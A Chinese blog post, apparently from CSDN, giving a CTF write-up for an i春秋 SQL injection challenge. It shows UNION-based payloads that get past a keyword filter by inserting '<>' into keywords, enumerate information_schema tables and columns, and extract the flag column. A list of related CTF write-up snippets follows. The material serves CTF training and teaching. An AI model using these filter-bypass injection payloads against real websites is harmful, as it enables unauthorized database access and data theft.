i春秋之SQL(详细WP)

最新推荐文章于 2022-10-27 12:26:37 发布
最新推荐文章于 2022-10-27 12:26:37 发布
阅读量1.5k 收藏 1
点赞数 2
分类专栏: CTFのWriteUp 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l2872253606/article/details/123056333
版权

解题目录

第一步:寻找注入点

第二步:确定注入类型

第三部:爆表

第四步: 查表

在看WP之前呢,有不懂的地方推荐查看下面的文章(挺详细的),还是需要些MySQL基础的

web 漏洞入门之 —— SQL 注入教程_实验楼-CSDN博客

第一步:寻找注入点

题目直接告诉我们了,这是道SQL注入题,打开连接,不难发现id应该就是注入点了

第二步:确定注入类型

用limit x 1或order by x,判断字段数 ,这里用order by

出现报错,应该是关键字被过滤掉了,这里尝试绕过了很久,发现好像只有<>能绕过了

可以看见,当x为4的时候,出现页面出现错误,说明该SQL查询语句的字段数为3,也就是说,该查询语句查询了3个列

第三部:爆表

利用基础的联合查询union select , 查看数据库信息

构造payload,先看看有回显的列

inurl?id=-1 unio<>n s<>elect 1,2,3

这里故意让id等于-1,是为了制造错误让语句不执行,防止影响到后面操作

回显了2说明,这个位置可以利用

构造paload,查询所有可用的数据库 

inurl?id=-1 unio<>n s<>elect 1,table_schema,3 from information_schema.tables

可以看到只有两个数据库,当前使用的数据库应该就是sqli ,也可以用database()查看

database()       当前使用的数据库

构造payload,查询sqli数据库的所有表

inurl?id=-1 unio<>n s<>elect 1,group_concat(table_name),3 from information_schema.tables where table_schema='sqli'

 继续查看表里面的所有列

inurl?id=-1 unio<>n s<>elect 1,group_concat(column_name),3 from information_schema.columns where table_name='info'

发现放flag的列名啦

第四步: 查表

构造payload,查看对应列名

inurl?id=-1 unio<>n s<>elect 1,group_concat(flAg_T5ZNdrm),3 from info

 拿到flag

金 帛
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
i春秋Web wp
ChanCherry的博客
09-16 500
0x00 爆破-1 <?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);"); show_source(__FILE__); ?> 这个代码的意义是如果匹配正则/^\w*$/,就打印变量$$a。...
春秋云境:CVE-2022-32991(SQL注入)
最新发布
m0_65712192的博客
04-12 1653
该CMS的welcome.php中存在SQL注入攻击。
i 春秋 CTF训练营 web——SQL注入 1(字符型注入)(手动注入)
AAAAAAAAAAAA66的博客
11-30 2546
这道题可以直接使用sqlmap 直接跑出。 下文介绍的是手注: 本文用到了搜狐插件hackbar,(使用效果与直接在url栏输入参数相同) 题目(得知是注入题) 判断是否为数字型 http://eci-2ze7889omx49vxiu5ma0.cloudeci1.ichunqiu.com/index.php?id=1 and 1=1 http://eci-2ze7889omx49vxiu5ma0.cloudeci1.ichunqiu.com/index.php?id=1 and 1.
i春秋《从0到1:CTFer成长之路》通关WP
07-08 4394
1、常见的搜集 题目内容:一共3部分flag 使用目录扫描工具,如:7kb-webpathbrute对该URL进行扫描: 打开第一个URL: 发现flag文件flag1_is_her3_fun.txt文件,访问即可得到flag1:n1book{info_1 打开第二个URL: 可以得到flag2:s_v3ry_im 打开第3个URL,下载index.php.swp,打开可以得到第3个flag3:p0rtant_hack}: 组合即可得到完整flag:n1book{info_1
2022年i春秋春季赛勇者赛道部分wp
qq_52988816的博客
05-09 963
差几名就能拿奖了,还是太菜了 Misc 签到 照着图片弹钢琴就会出现flag tiger 一个rot47加密,一个lsb隐写加密 之后得到解压密码71zr9H6jnXRHn64WBxMbCzz16saCZWiw 发现好像需要明文攻击来解密码Nh6i@= 二维码存在零宽隐写,这里话有个坑点,直接扫好像是提不出来的,可以写个脚本来提 或者我看wp可以用bcTester来题(GET新点)之后用网站解码就可以 https://yuanfux.github.io/zero-width-web/ 接着就是维吉尼亚密码解
i春秋首届全国数据安全大赛部分复盘
热门推荐
weixin_48421613的博客
10-27 1万+
2022年10月25日,为期两日的数据安全大赛于i春秋平台线上举行,在王队长的领队下,团队三个屁民开始了有趣的解题之旅。题目分为四个类型,分别是“安全知识”、“数据分析”、“数据算法”、以及数据安全。时间有点短,再加上有里还有活要干,所以很多题也没有答完,这次由我代表大家给大家进行一个复盘。
i 春秋月刊 第 1 期到第 5 期
11-16
《i春秋月刊》系列是针对信息技术领域,特别是网络安全与编程技术的一套综合期刊,涵盖了从基础编程语言到高级安全话题的广泛内容。这五期的主题分别为:Python应用、代码审计、SQL注入和XSS攻击,这些都是IT行业中...
第四期-SQL注入的入坑之道.pdf
08-08
SQL 注入SQL 注入原理篇 - SQL 注入初级 SQL 注入中级 SQL 注入高级 SQL 工具篇 DNS 注入 &sqlmap 进行 DNS 注入 11 种常见 SQLmap 使用方法 SQL注入工具 SQL注入工具拓展篇 SQL 注入实战篇 - Thinkphp 框架 3.2.x ...
arkainte_wp_onegen_sql_源码
10-02
Arkainte_wp_onegen_sql_源码是一个与WordPress相关的数据库文件集合,主要涉及SQL操作。在iOS测试环境中,这个源码可能被用来管理和操作WordPress网站的数据库。WordPress是一个广泛使用的开源内容管理系统,其核心...
SQL Server2008安装详细图解
03-30
SQL Server2008安装详细图解SQL Server2008安装详细图解SQL Server2008安装详细图解SQL Server2008安装详细图解SQL Server2008安装详细图解SQL Server2008安装详细图解
赛博地球杯工业互联网安全大赛wp1
08-03
本文将对赛博地球杯工业互联网安全大赛 WP1 进行详细解析,涵盖网络协议、PHP 和 SQL 等相关知识点。 一、网络协议 在 WP1 中,我们可以看到 ping 命令的使用,ping 命令是一种网络诊断工具,用于测试网络连接是否...
i春秋SQLi--“百度杯”CTF比赛 九月场
金 帛的博客
04-04 927
i春秋WP
春秋-在线挑战-综合渗透训练全部详解(更新中)
星语惜馨的博客
10-23 2587
        这次在爱春秋玩玩看它的综合渗透训练,这篇博客就做一个知识汇总好了,网上攻略很多,就多写一些注意要点和不同的方法,本人菜鸟级别,能过一关就更新一次。 我的新浪博客:http://blog.sina.com.cn/laomacanhu 》注意点:c盘的tools是工具包,最上面的场景拓扑图是本机和服务器ip,剪切板可以实现内外粘贴。 一、爱春秋-在线挑战-我很简单,请不要欺负我 ...
暑期练习web22:sqli (i春秋sql盲注,逗号绕过
qq_41618162的博客
08-23 1094
这道题一打开就是个白板,开始还以为网不好还没加载出来。。。查看源码 看到了login.php这个路径,于是满怀欣喜的访问它 结果进去后什么都没得。。。以前也遇到过这种情况,所以拿bp抓一下包,也没发现东西 这下就一筹莫展了,于是参考了一下wp,才知道发生了302重定向,简单说就是从一个跳转到另一个页面,而且这个过程是我们刚进入题目连接就发生了的 这里一个是1 另一个是l,很容易混淆...
i春秋 WEB SQL
A_dmin的博客
06-20 850
i春秋 WEB SQL 一天一道CTF题目,能多不能少 打开网页,发现有个id参数,而且有提示: 查看网页源代码,发现有sql语句显示: 直接抓包,发现and,or,order好像被过滤了, 使用/**/,发现还是不行: 经过尝试发现,可以使用<>绕过关键字过滤 经过尝试,得到有三个字段: 使用union查询,发现select也被过滤掉了,同理使用<> 发现2的位置...
i春秋:无处不在的SQL注入
MyBack
06-01 3686
实验环境 实验环境 操作机:Windows XP 目标机:Windows 2003 目标网址:www.test.ichunqiu实验工具:sqlmap注入工具 实验目的 本节课程通过对SQL注入的演示,让大家了解SQL注入漏洞的方式,并学习应对此种漏洞的防御方法。 实验思路 手工检测判断注入点利用SQLMap注入数据库获取数据库信息防御
i春秋web-SQL(基础绕过注入)
Sea_Sand息禅
05-21 743
很简单的一道注入,没有任何闭合,直接就是个整数的注入 id=1 order by 1 报错:inj code! 对order进行处理 1)id=1 or<>der by 1 报错:inj code! 2)id=1 ord<>er by 1 页面正常 id=-1 union sel<>ect 1,2,3 页面显示2,说明作用...
Web-SQLi[i春秋][200pt]
Laurel_60的博客
08-04 1352
打开网址,是个登陆界面。 根据题目,第一反应–怕不是sql注入哦!经过尝试之后会发现,username=admin时,返回的是password error。ok,日常抓包,然后用intruder看看有没有字符被过滤掉。 事实证明,这个%有着大大的问题。拜读了网上的各种wp之后,原来是spintf()函数格式化字符串,导致了单引号逃逸。通过构造- - username=admin%1$\'...
SQL注入基础实战(i春秋
Jaychouzzk
08-17 3435
1.Access手工注入  实验环境 操作机:Windows XP 目标机:Windows Server 2003 目标地址:http://172.16.12.2 实验工具 火狐浏览器:火狐浏览器是一款非常流行的Internet浏览器。 实验目的 1、学习Asp手工注入方法 2、学习Asp手工注入原理 实验内容 Access Access是Microsoft Office Acc...
SQL之SELECT FROM
02-20
SQL即结构化查询语言(Structured Query Language),是一种特殊目的的编程语言,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统;同时也是数据库脚本文件的扩展名。SQL语句无论是种类还是数量都是繁多的,很多语句也是经常要用到的,SQL查询语句就是一个典型的例子,无论是高级查询还是低级查询,SQL查询语句的需求是最频繁的。此文档是SQL查询语言的基础命令,SELECT FROM的例子。可以轻松学会sql的查询命令。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金 帛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值